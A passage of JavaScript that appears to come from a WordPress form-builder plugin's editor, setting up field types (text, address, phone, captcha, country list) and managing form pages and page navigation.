	td.appendChild(br5);
	td.appendChild(el_type_radio_address);
	td.appendChild(Address);
	td.appendChild(br10);
	td.appendChild(el_type_radio_mark_map);
	td.appendChild(Mark_map);
	td.appendChild(br9);
	td.appendChild(el_type_radio_submitter_mail);
	td.appendChild(Submitter_mail);
	td.appendChild(br6);
	td.appendChild(el_type_radio_number);
	td.appendChild(Number);
	td.appendChild(br7);
	td.appendChild(el_type_radio_phone);
	td.appendChild(Phone);
	td.appendChild(br8);
	td.appendChild(el_type_radio_hidden);
	td.appendChild(Hidden);
	
	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");

			
	go_to_type_text(new_id);
	
}

function go_to_type_text(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_text(new_id,'Text:', 'left', '200', '', '', 'no', 'no', '',w_attr_name, w_attr_value);
}

function go_to_type_number(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_number(new_id,'Number:', 'left', '200', '', '', 'no', 'no', '',w_attr_name, w_attr_value);
}

function go_to_type_password(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_password(new_id,'Password:', 'left', '200', 'no', 'no', 'wdform_input',w_attr_name, w_attr_value);
}

function go_to_type_textarea(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_textarea(new_id,'Textarea:', 'left', '200', '100', '','', 'no', 'no', '',w_attr_name, w_attr_value)
}

function go_to_type_name(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
 	w_first_val=['',''];
 	w_title=['',''];
  w_mini_labels=['Title','First','Last','Middle'];
	type_name(new_id,'Name:', 'left', w_first_val, w_title, w_mini_labels, '100', 'normal', 'no', 'no', '',w_attr_name, w_attr_value)
}
	
function go_to_type_address(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
  w_mini_labels=['Street Address', 'Street Address Line 2', 'City', 'State / Province / Region', 'Postal / Zip Code', 'Country',];
	w_disabled_fields=['no', 'no', 'no', 'no', 'no', 'no'];
	type_address(new_id,'Address:', 'left', '300', w_mini_labels, w_disabled_fields, 'no', 'wdform_address', w_attr_name, w_attr_value)
}

function go_to_type_phone(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
 	w_first_val=['',''];
 	w_title=['',''];
  w_mini_labels = ['Area Code','Phone Number'];
	type_phone(new_id,'Phone:', 'left', '135', w_first_val, w_title, w_mini_labels, 'no', 'no', '',w_attr_name, w_attr_value)
}

function go_to_type_submitter_mail(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_submitter_mail(new_id,'E-mail:', 'left', '200', '', '', 'no', 'no', '', w_attr_name, w_attr_value);
}

function go_to_type_time(new_id)
{
	
 	w_attr_name=[];
 	w_attr_value=[];
	w_mini_labels = ['HH','MM','SS', 'AM/PM'];
	type_time(new_id, 'Time:', 'left', '24', '0', '1','','','', w_mini_labels, 'no', '',w_attr_name, w_attr_value);
	
}

function go_to_type_date(new_id)
{
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_date(new_id, 'Date:', 'left', '', 'no', '', '%Y-%m-%d', '...',w_attr_name, w_attr_value);
}

function go_to_type_date_fields(new_id)
{
	
 	w_attr_name=[];
 	w_attr_value=[];
  var current_date = new Date();
	w_to = current_date.getFullYear();
	type_date_fields(new_id, 'Date:', 'left', '', '', '', 'SELECT', 'SELECT', 'SELECT', 'day', 'month', 'year', '45', '60', '60', 'no', 'wdform_date_fields', '1901', w_to, '&nbsp;/&nbsp;', w_attr_name, w_attr_value);
}

function go_to_type_button(new_id)
{
 	w_title=[ "Button"];
 	w_func=[""];
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_button(new_id, w_title, w_func, 'wdform_button',w_attr_name, w_attr_value);
}

function go_to_type_own_select(new_id)
{
 	w_choices=[ "Select value", "option 1", "option 2"];
 	w_choices_checked=["1", "0", "0"];
	w_choices_disabled=[true, false, false];
 	w_attr_name=[];
 	w_attr_value=[];
	type_own_select(new_id, 'Select:', 'left', '200',w_choices, w_choices_checked, 'no','wdform_select',w_attr_name, w_attr_value, w_choices_disabled);
}

function go_to_type_country(new_id)
{
 	w_countries=["","Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
	w_attr_name=[];
 	w_attr_value=[];
	type_country(new_id,'Country:', w_countries, 'left', '200', 'no', 'wdform_select',w_attr_name, w_attr_value);
}

function el_captcha()
{
//edit table
if(document.getElementById("editing_id").value)
	new_id=document.getElementById("editing_id").value;
else
	new_id=gen;
	
	if(document.getElementById('_wd_captchaform_id_temp'))
	{
		alert("The captcha already has been created.");
		return;
	}
	
	if(document.getElementById('wd_recaptchaform_id_temp'))
	{
		alert("The captcha already has been created.");
		return;
	}
	
	var el_type_label = document.createElement('label');
                el_type_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_type_label.innerHTML = "<br />&nbsp;&nbsp;Field type";
	
	var el_type_radio_captcha = document.createElement('input');
                el_type_radio_captcha.setAttribute("id", "el_type_captcha");
                el_type_radio_captcha.setAttribute("type", "radio");
                el_type_radio_captcha.setAttribute("value", "captcha");
                el_type_radio_captcha.style.cssText = "margin-left:15px";
                el_type_radio_captcha.setAttribute("name", "el_type_captcha");
                el_type_radio_captcha.setAttribute("onclick", "go_to_type_captcha('"+new_id+"')");
		el_type_radio_captcha.setAttribute("checked", "checked");
		Captcha = document.createTextNode("Simple Captcha");
		
	var el_type_radio_recaptcha = document.createElement('input');
                el_type_radio_recaptcha.setAttribute("id", "el_type_radio_recaptcha");
                el_type_radio_recaptcha.setAttribute("type", "radio");
                el_type_radio_recaptcha.setAttribute("value", "recaptcha");
                el_type_radio_recaptcha.style.cssText = "margin-left:15px";
                el_type_radio_recaptcha.setAttribute("name", "el_type_captcha");
                el_type_radio_recaptcha.setAttribute("onclick", "go_to_type_recaptcha('"+new_id+"')");
		Recaptcha_text = document.createTextNode("Recaptcha");

	var td  = document.getElementById('edit_table');
	
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	
	td.appendChild(el_type_label);
	td.appendChild(br1);
	td.appendChild(el_type_radio_captcha);
	td.appendChild(Captcha);
	
	
	//Recaptchan anjatac
	
	td.appendChild(br2);
	td.appendChild(el_type_radio_recaptcha);
	td.appendChild(Recaptcha_text);
	
	
	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");

	
 	w_attr_name=[];
 	w_attr_value=[];
	go_to_type_captcha(new_id);
}

function go_to_type_captcha(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_captcha(new_id,'Word Verification:', 'left', '6','',w_attr_name, w_attr_value);
}

function go_to_type_recaptcha(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_recaptcha(new_id,'Recaptcha Word Verification:', 'left', '', '', 'red', '',w_attr_name, w_attr_value);
}



///////////////////////////////////////////////
///////////  el_page_break   //////////////////
///////////////////////////////////////////////

function el_page_break()
{
		for(t=form_view_max; t>0; t--)
		{
			if(document.getElementById('form_id_tempform_view'+t))
			{
					last_view=t;
					break;
			}
		}
	if(document.getElementById('form_id_tempform_view'+t).getAttribute('page_title'))
		w_page_title=document.getElementById('form_id_tempform_view'+t).getAttribute('page_title');
	else
		w_page_title='Untitled Page';
	
	w_title	=[ "Next","Previous"];
 	w_type	=["button","button"];
 	w_class	=["wdform_page_button","wdform_page_button"];
 	w_check	=['false', 'false'];
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_page_break("0",w_page_title , w_title, w_type, w_class, w_check, w_attr_name, w_attr_value);
}
function el_page_navigation()
{
	
	w_type=document.getElementById('pages').getAttribute('type');
	w_show_numbers=false;
	w_show_title=false;

	if(document.getElementById('pages').getAttribute('show_numbers')=="true")
		w_show_numbers=true;
	
	if(document.getElementById('pages').getAttribute('show_title')=="true")
		w_show_title=true;
	
 	w_attr_name=[];
 	w_attr_value=[];
	
	type_page_navigation( w_type, w_show_title , w_show_numbers , w_attr_name, w_attr_value);
}

function remove_section_break(id)
{
	var tr = document.getElementById(id);
	is3=false;
	if(tr.nextSibling.nodeType==3)
	{
			move=tr.nextSibling.nextSibling.firstChild;
			to=tr.previousSibling.previousSibling.firstChild;
			is3=true;
	}
	else
	{
			move=tr.nextSibling.firstChild;
			to=tr.previousSibling.firstChild;
	}
	
	
	l=move.childNodes.length;
	for(k=0;k<l;k++)
	{
		if(to.childNodes[k])
		{
			while(move.childNodes[k].firstChild.firstChild)
				to.childNodes[k].firstChild.appendChild(move.childNodes[k].firstChild.firstChild);
		}
		else
		
		to.appendChild(move.childNodes[k]);			
	}
	
	if(is3)
	{
		tr.parentNode.removeChild(tr.nextSibling);
		tr.parentNode.removeChild(tr.nextSibling);
	}
	else
		tr.parentNode.removeChild(tr.nextSibling);
		
	tr.parentNode.removeChild(tr);
	
}

function remove_row(id)
{
	var tr = document.getElementById(id);
	tr.parentNode.removeChild(tr);
	
}

function destroyChildren(node)
{
  while (node.firstChild)
      node.removeChild(node.firstChild);
}

function make_pagebreak_button(next_or_previous,title,type, class_ ,id)
{
	switch(type)
	{
		case 'button': 
		{ 
		
			var element = document.createElement('button');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('type', "button");
				element.setAttribute('class', class_);
				element.style.cursor="pointer";
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'text': {	
			
			var element = document.createElement('span');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
				element.style.cursor="pointer";
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'img':{ 			
		
			var element = document.createElement('img');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
				element.style.cursor="pointer";
				element.src=title;
				
			return element;
			
			break;
		}
	}
}

function show_or_hide(id) {
	if (!jQuery("#form_id_tempform_view"+id).is(":visible")) {
    show_form_view(id);
		jQuery("#show_page_img_"+id).attr("onmouseover", "chnage_icons_src(this,'minus')");
		jQuery("#show_page_img_"+id).attr("onmouseout", "chnage_icons_src(this,'minus')");
	}
	else {
		hide_form_view(id);
		jQuery("#show_page_img_"+id).attr("onmouseover", "chnage_icons_src(this,'plus')");
		jQuery("#show_page_img_"+id).attr("onmouseout", "chnage_icons_src(this,'plus')");
	}
}

function show_form_view(id) {
	document.getElementById("form_id_tempform_view_img"+id).childNodes[0].childNodes[0].removeAttribute("width", "100%");
	document.getElementById("form_id_tempform_view_img"+id).style.backgroundColor="";
	document.getElementById("form_id_tempform_view_img"+id).childNodes[0].childNodes[0].style.display="none";
	document.getElementById("show_page_img_"+id).src=fmc_plugin_url+'/images/minus.png';
  jQuery("#form_id_tempform_view"+id).show('medium');
}

function hide_form_view(id) {
  form_maker_remove_spaces(document.getElementById("form_id_tempform_view_img" + id));
  jQuery("#form_id_tempform_view"+id).hide('medium', function() {
    document.getElementById("form_id_tempform_view_img"+id).childNodes[0].childNodes[0].setAttribute("width", "100%");
    document.getElementById("form_id_tempform_view_img"+id).childNodes[0].childNodes[0].innerHTML=document.getElementById("form_id_tempform_view"+id).getAttribute('page_title');
    document.getElementById("form_id_tempform_view_img"+id).childNodes[0].childNodes[0].removeAttribute('style');
    document.getElementById("show_page_img_"+id).src=fmc_plugin_url+'/images/plus.png';
  });
}

function generate_buttons(id)
{

	form_view_elemet=document.getElementById("form_id_tempform_view"+id);

	if(form_view_elemet.parentNode.previousSibling)
	{
		if(form_view_elemet.parentNode.previousSibling.tagName=="TABLE")
			table=true;
		else
			if(form_view_elemet.parentNode.previousSibling.previousSibling)
				if(form_view_elemet.parentNode.previousSibling.previousSibling.tagName=="TABLE")
					table=true;
				else
					table=false;
			else
				table=false;
				
		if(table)
		{
			/*if(!table.firstChild.tagName)
				table.removeChild(table.firstChild);*/

			if(form_view_elemet.getAttribute('previous_title'))
				{
						previous_title	= form_view_elemet.getAttribute('previous_title');
						previous_type	= form_view_elemet.getAttribute('previous_type');
						previous_class	= form_view_elemet.getAttribute('previous_class');
				}
					else
					{
						previous_title	= "Previous";
						previous_type	= "button";
						previous_class	= "";
					}
			next_or_previous="previous";

			previous=make_pagebreak_button(next_or_previous, previous_title, previous_type, previous_class, id);
			var td = document.createElement("td");
				td.setAttribute("valign", "middle");
				td.setAttribute("align", "left");
			
			td.appendChild(previous);
			page_nav.appendChild(td);
		}
	}


	var td = document.createElement("td");
		td.setAttribute("id", "page_numbersform_id_temp"+id);
		td.setAttribute("width", "100%");
		td.setAttribute("valign", "middle");
		td.setAttribute("align", "center");
	page_nav.appendChild(td);



	if(form_view_elemet.parentNode.nextSibling)
	{
		if(form_view_elemet.parentNode.nextSibling.tagName=="TABLE")
			table=true;
		else
			if(form_view_elemet.parentNode.nextSibling.nextSibling)
			{
				if(form_view_elemet.parentNode.nextSibling.nextSibling.tagName=="TABLE")
					table=true;
				else
					table=false;
			}
			else
				table=false;
				
		if(table)
		{
			if(form_view_elemet.getAttribute('previous_title')){
						next_title	=form_view_elemet.getAttribute('next_title');
						next_type	=form_view_elemet.getAttribute('next_type');
						next_class	=form_view_elemet.getAttribute('next_class');
					}
					else
					{
						next_title	= "Next";
						next_type	= "button";
						next_class	= "";
					}
		
			next_or_previous="next";
		
			next=make_pagebreak_button(next_or_previous,next_title,next_type,next_class, id);
			var td = document.createElement("td");
				td.setAttribute("valign", "middle");
				td.setAttribute("align", "right");
			
			td.appendChild(next);
			page_nav.appendChild(td);
		}
	}

}

function generate_page_nav(id)
{
form_view=id;
document.getElementById('form_id_tempform_view'+id).parentNode.style.borderWidth="1px";
////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////
for(t=1; t<=form_view_max; t++)
	if(document.getElementById('form_id_tempform_view'+t))
	{
		page_nav=document.getElementById("form_id_temppage_nav"+t);
		destroyChildren(page_nav);
		generate_buttons(t);
	}

generate_page_bar();
refresh_page_numbers();

////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////
}

function remove_page(id)
{	
	if(confirm('Do you want to delete the page?'))
	{
		refresh_pages_without_deleting(id);
	}
}

function remove_page_all(id)
{
	if(confirm('Do you want to delete the all fields in this page?'))
	{
		form_view_elemet=document.getElementById("form_id_tempform_view"+id);

		form_view_count=0;
			
		for(i=1; i<=30; i++)
		{
			if(document.getElementById('form_id_tempform_view'+i))
			{
				form_view_count++;
			}
		}

	
		if(form_view_count==1)
		{
	 
			form_view_elemet.innerHTML='';
			
			tbody=form_view_elemet;		
				
			tr=document.createElement('tr');
				tr.setAttribute('class','wdform_tr1');
			td=document.createElement('td');
				td.setAttribute('class','wdform_td1');
				
				
			tr_page_nav=document.createElement('tr');
				tr_page_nav.setAttribute('valign','top');
				tr_page_nav.setAttribute('class','wdform_footer');
				
			td_page_nav=document.createElement('td');
				td_page_nav.setAttribute('colspan','100');
				
			table_min_page_nav=document.createElement('table');
				table_min_page_nav.setAttribute('width','100%');
				
			tbody_min_page_nav=document.createElement('tbody');
			tr_min_page_nav=document.createElement('tr');
				tr_min_page_nav.setAttribute('id','form_id_temppage_nav'+form_view);
				
			table_min=document.createElement('table');
				table_min.setAttribute('class','wdform_table2');
			tbody_min=document.createElement('tbody');
				tbody_min.setAttribute('class','wdform_tbody2');
				
			table_min.appendChild(tbody_min);
			td.appendChild(table_min);
			tr.appendChild(td);
			tbody_min_page_nav.appendChild(tr_min_page_nav);
			table_min_page_nav.appendChild(tbody_min_page_nav);
			td_page_nav.appendChild(table_min_page_nav);
			tr_page_nav.appendChild(td_page_nav);
			tbody.appendChild(tr);
			tbody.appendChild(tr_page_nav);
			
		return;
		}
		

	
		form_view_table=form_view_elemet.parentNode;
		document.getElementById("take").removeChild(form_view_table);
		refresh_pages(id);
	}
}

function refresh_pages(id)
{
	temp=1;
	form_view_count=0;
	destroyChildren(document.getElementById("pages"));

	for(i=1; i<=30; i++)
	{
		if(document.getElementById('form_id_tempform_view'+i))
		{
			form_view_count++;
		}
	}

	if(form_view_count>1)
	{
		for(i=1; i<=30; i++)
		{
			if(document.getElementById('form_id_tempform_view'+i))
			{
				page_number = document.createElement('span');
				page_number.setAttribute('id','page_'+i);
				page_number.setAttribute('class','page_deactive');
				page_number.innerHTML=(temp);
				temp++;
				document.getElementById("pages").appendChild(page_number);
			}
		}
	}
	
	else
	{
		destroyChildren(document.getElementById("edit_page_navigation"));
		for(i=1; i<=30; i++)
		{
			if(document.getElementById('form_id_tempform_view'+i))
			{
				document.getElementById('form_id_tempform_view'+i).parentNode.style.borderWidth="0px";
				document.getElementById('form_id_tempform_view'+i).style.display="block";
				document.getElementById("form_id_temppage_nav"+i).innerHTML="";
        form_maker_remove_spaces(document.getElementById("form_id_tempform_view_img" + i));
				document.getElementById("form_id_tempform_view_img"+i).childNodes[0].childNodes[0].removeAttribute("width", "100%");
				document.getElementById("form_id_tempform_view_img"+i).style.backgroundColor="";
				document.getElementById("form_id_tempform_view_img"+i).childNodes[0].childNodes[0].style.display="none";
				document.getElementById("show_page_img_"+i).src=fmc_plugin_url+'/images/minus.png';
				form_view=i;
				return;
			}
		}	
	}
	
	for(i=parseInt(id)+1; i<=30; i++)
		if(document.getElementById('form_id_tempform_view'+i))
		{
			generate_page_nav(i);
			return;
		}
		
	for(i=parseInt(id)-1; i>0; i--)
		if(document.getElementById('form_id_tempform_view'+i))
		{
			generate_page_nav(i);
			return;
		}
	
}


function refresh_pages_without_deleting(id)
{
	form_view_elemet=document.getElementById("form_id_tempform_view"+id);
	
	
	form_view_count=0;
	for(i=1; i<=30; i++)
	{
		if(document.getElementById('form_id_tempform_view'+i))
		{
			form_view_count++;
		}
	}


	
	if(form_view_count==1)
	{
	
		form_view_elemet.innerHTML='';
 
		tbody=form_view_elemet;		
			
		tr=document.createElement('tr');
			tr.setAttribute('class','wdform_tr1');
		td=document.createElement('td');
			td.setAttribute('class','wdform_td1');
			
			
		tr_page_nav=document.createElement('tr');
			tr_page_nav.setAttribute('valign','top');
			tr_page_nav.setAttribute('class','wdform_footer');
			
		td_page_nav=document.createElement('td');
			td_page_nav.setAttribute('colspan','100');
			
		table_min_page_nav=document.createElement('table');
			table_min_page_nav.setAttribute('width','100%');
			
		tbody_min_page_nav=document.createElement('tbody');
		tr_min_page_nav=document.createElement('tr');
			tr_min_page_nav.setAttribute('id','form_id_temppage_nav'+form_view);
			
		table_min=document.createElement('table');
			table_min.setAttribute('class','wdform_table2');
		tbody_min=document.createElement('tbody');
			tbody_min.setAttribute('class','wdform_tbody2');
			
		table_min.appendChild(tbody_min);
		td.appendChild(table_min);
		tr.appendChild(td);
		tbody_min_page_nav.appendChild(tr_min_page_nav);
		table_min_page_nav.appendChild(tbody_min_page_nav);
		td_page_nav.appendChild(table_min_page_nav);
		tr_page_nav.appendChild(td_page_nav);
		tbody.appendChild(tr);
		tbody.appendChild(tr_page_nav);
		
	return;
	}
	
	table=form_view_elemet.parentNode.previousSibling;
	
	while(table)
	{
		if(table.tagName=="TABLE")
			break;
		else
			table=table.previousSibling;
	}
	
	if(!table)
	{
		table=form_view_elemet.parentNode.nextSibling;
		while(table)
		{
			if(table.tagName=="TABLE")
				break;
			else
				table=table.nextSibling;
		}

	}
	
	////////////////////////////////////////////////////
	
	
			i=gen;
			gen++;
			
			var tr = document.createElement('tr');
				tr.setAttribute("id", i);
				tr.setAttribute("class", "wdform_tr_section_break");
				tr.setAttribute("type", "type_section_break");
				
				
			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML="custom_"+i;
				
			table_form_view=table.firstChild;

			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_section_break("'+i+'")');
					img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//					img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
///////////////////////////////////////////////////////////////////////////////////////////////
			var in_editor = document.createElement("td");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
					in_editor.setAttribute("valign", "top");
					in_editor.setAttribute("colspan", "100");
					in_editor.setAttribute('class', 'toolbar_padding');
					
				in_editor.innerHTML="<hr/>";
			
			
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			td_EDIT.appendChild(label);
			tr.appendChild(in_editor);

			tr.appendChild(td_X);
			tr.appendChild(td_EDIT);
			tr.appendChild(td_DUBLICATE);

			
				beforeTr=table_form_view.lastChild;
				table_form_view.insertBefore(tr, beforeTr);
		

	

	while(form_view_elemet.childNodes[1])
	{
		beforeTr=table_form_view.lastChild;
		table_form_view.insertBefore(form_view_elemet.firstChild, beforeTr);
	}
	
	
		form_view_table=form_view_elemet.parentNode;
		document.getElementById("take").removeChild(form_view_table);
		refresh_pages(id);
}


function make_page_steps_front()
{
	destroyChildren(document.getElementById("pages"));
	show_title=document.getElementById('el_show_title_input').checked;
	k=0;
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById('form_id_tempform_view'+j))
			{
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
			
			page_number = document.createElement('span');
			page_number.setAttribute('id','page_'+j);
			page_number.setAttribute('onClick','generate_page_nav("'+j+'")');
			if(j==form_view)
				page_number.setAttribute('class',"page_active");
			else
				page_number.setAttribute('class',"page_deactive");
			if(show_title)
			{
				page_number.innerHTML=w_pages;
			}
			else
				page_number.innerHTML=k;
			
			document.getElementById("pages").appendChild(page_number);
		}
	}

}

function make_page_percentage_front()
{
	destroyChildren(document.getElementById("pages"));
	show_title=document.getElementById('el_show_title_input').checked;
	
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
		
	var b = document.createElement('b');
       	b.style.margin='3px 7px 3px 3px';
		//b.style.vertical-align='middle';
	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById('form_id_tempform_view'+j))
			{
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
				
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('span');
					if(k==1)
						cur_page_title.style.paddingLeft="30px";
					else
						cur_page_title.style.paddingLeft="5px";
						cur_page_title.innerHTML=w_pages;
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	div_parent.appendChild(div);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById("pages").appendChild(div_parent);

	
}
function make_page_none_front()
{
	document.getElementById("pages").innerHTML="--------------------------------------------<br> NO PAGE BAR <br>--------------------------------------------";
}

function generate_page_bar() {
  need_enable = false;
  el_page_navigation();
  add(0);
  need_enable = true;
}

function remove_add_(id)
{
			attr_name= new Array();
			attr_value= new Array();
			var input = document.getElementById(id); 
			atr=input.attributes;
			for(v=0;v<30;v++)
				if(atr[v] )
				{
					if(atr[v].name.indexOf("add_")==0)
					{
						attr_name.push(atr[v].name.replace('add_',''));
						attr_value.push(atr[v].value);
						input.removeAttribute(atr[v].name);
						v--;
					}
				}
			for(v=0;v<attr_name.length; v++)
			{
				input.setAttribute(attr_name[v],attr_value[v])
			}
}

function add(key) {
  if (document.getElementById("element_type").value == "type_grading") {
    for (k = 100; k > 0; k--) {
 		  if (document.getElementById("el_items" + k)) {
        break;
		  }
    }
    m = k;
    var items_input = "";
    for (i = 0; i <= m; i++) {
	if(document.getElementById("el_items"+i)){
	items_input = items_input+document.getElementById("el_items"+i).value+":";	
	}
	}
	
	items_input += document.getElementById("element_total").value;
	
	if(document.getElementById('editing_id').value)
		id=document.getElementById('editing_id').value;
	else
		id=gen;

  
   var hidden_input_item = document.createElement('input');
						hidden_input_item.setAttribute("id", id+"_hidden_itemform_id_temp");
						hidden_input_item.setAttribute("name", id+"_hidden_itemform_id_temp");
						hidden_input_item.setAttribute("type", "hidden");
						hidden_input_item.setAttribute("value", items_input);	
						
	
  var td_for_hidden = document.getElementById(id+"_element_sectionform_id_temp");								
						
	td_for_hidden.appendChild(hidden_input_item);

	}
	
	
	if(document.getElementById("element_type").value=="type_matrix")
	{
	

	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_rows"+i))
		 {
			break;
		 }
	}	
	 m=i;

	for(i=100;i>0;i--)
	{
		 if(document.getElementById("el_columns"+i))
		 {
			break;
		 }
	}	
	n=i;
	var row_input="";
	var column_input="";
	var row_num="";
	var column_num="";
	
	for(i=1;i<=m;i++)
	{
		if(document.getElementById("el_rows"+i))
		{
			row_input = row_input+document.getElementById("el_rows"+i).value+"***";	
			row_num += i+',';
		}
	}
	
	for(i=1;i<=n;i++)
	{
		if(document.getElementById("el_columns"+i))
		{
			column_input= column_input+document.getElementById("el_columns"+i).value+"***";	
			column_num += i+',';
		}
	}
	
	
